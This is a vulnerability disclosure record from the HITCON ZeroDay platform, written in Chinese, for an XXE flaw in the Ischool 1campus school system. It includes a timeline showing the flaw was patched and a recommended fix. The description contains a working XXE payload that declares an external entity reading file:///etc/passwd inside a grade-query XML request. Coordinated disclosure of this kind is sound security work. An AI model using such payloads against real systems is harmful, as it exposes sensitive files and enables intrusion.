Ischool 1campus 系統 XXE

Vulnerability Overview

ZDID: ZD-2024-00776
發信 Vendor: 澔學學習股份有限公司
Title: Ischool 1campus 系統 XXE
Introduction: 可以自定義的xml enity 進行物件注入

處理狀態

目前狀態

公開

Last Update : 2024/09/04

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2024/07/03 13:47:20 : 新提交 (由 Whale120 更新此狀態)
2024/07/05 16:19:15 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/10 18:54:16 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/10 18:54:16 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/07/10 18:54:17 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/14 16:14:30 : 複測申請中 (由組織帳號更新此狀態)
2024/08/26 19:06:29 : 未修補完成 (由 Whale120 更新此狀態)
2024/08/27 22:20:54 : 修補中 (由組織帳號更新此狀態)
2024/08/29 19:44:48 : 已修補 (由組織帳號更新此狀態)
2024/08/29 19:44:57 : 已修補 (由組織帳號更新此狀態)
2024/08/29 19:45:08 : 已修補 (由組織帳號更新此狀態)
2024/09/02 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
2024/09/03 15:49:21 : 確認已修補 (由 Whale120 更新此狀態)
2024/09/04 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2024-00776
通報者：WH_ALE (Whale120)
風險：高
類型：XML 外部實體注入 (XML External Entities (XXE))

參考資料

攻擊者可利用此漏洞取得系統敏感資料、攻擊內網甚至取得系統控制權。

OWASP Top 10 - 2017 A4 - XML External Entities (XXE)
https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)

XML External Entity (XXE) Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

登入後紀錄查詢成績的封包，會發現是透過XML進行資料存取。

把封包送到repeater，植入XXEPAYLOAD重新發送：


<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Envelope>
    <Header>
        <TargetService>&xxe;</TargetService>
        <SecurityToken Type="Session">
            <SessionID>VJp3Z647LQhzbeFpcKUu6w</SessionID>
        </SecurityToken>
    </Header>
    <Body>
        <StudentID>2501</StudentID>
        <ViewSemester>1122</ViewSemester>
    </Body>
</Envelope>

成功取得 /etc/passwd 資料

修補建議

挑選安全地java xml解析庫，並且更新至最新版本。

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

Ischool 1campus 系統 XXE - HITCON ZeroDay

Vulnerability Detail Report